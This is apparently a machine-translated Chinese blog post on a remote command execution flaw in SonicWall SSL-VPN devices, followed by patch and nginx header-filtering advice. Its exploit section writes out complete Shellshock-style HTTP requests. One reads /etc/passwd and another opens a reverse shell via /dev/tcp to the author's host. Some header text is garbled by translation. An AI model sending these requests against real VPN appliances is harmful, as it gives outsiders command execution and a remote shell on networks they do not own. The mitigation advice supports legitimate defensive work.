SonicWall SSL-VPN Remote command execution Vulnerability

I. Vulnerability description

SonicWall SSL-VPN Historical version Remote command execution vulnerability and related exploit scripts. Because SonicWall SSL-VPN uses an older version of the kernel and HTTP CGI executable, attackers can construct malicious HTTP headers, resulting in remote arbitrary command execution, and gain host control permissions, software impact version VPN <8.0.0.4

Second, vulnerability recurrence

Exp:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostWorld :8080 user-agent: () {:; }; echo ; /bin/bash -c "cat /etc/passwd" Accept: */* Accept-Language: zh-CN,zh; Q = 0.8, useful - TW; Q = 0.7, useful - HK; Q = 0.5, en - US; Q = 0.3, en. Q =0.2 Accept-encoding: gzip, Deflate Connection: closeCopy the code

Access execution view: cat /etc/passwd

Execute rebound shell

GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostWorld :8080 user-agent: () {:; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &" Accept: */* Accept-Language: zh-CN,zh; Q = 0.8, useful - TW; Q = 0.7, useful - HK; Q = 0.5, en - US; Q = 0.3, en. Q =0.2 Accept-encoding: gzip, Deflate Connection: closeCopy the code

Successfully obtained shell:

A simple script tries to verify:

Perform printing:

Three, protective repair suggestions

General repair recommendations

Upgrade to Sonic SMA 8.0.0.4

Temporary repair proposal

Check for HTTP headers

Possible feature strings are as follows () {:; };

Enforce header filtering using nginx reverse proxy

location  /cgi-bin/jarrewrite.sh {
    proxy_pass http://your-ssl-vpn:your-ssl-vpn-port$request_uri;
    proxy_set_header host $http_host;
    proxy_set_header user-agent "sonicwall ssl-vpn rec fix";
}
Copy the code

Reference:

My.oschina.net/u/4600927/b…

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…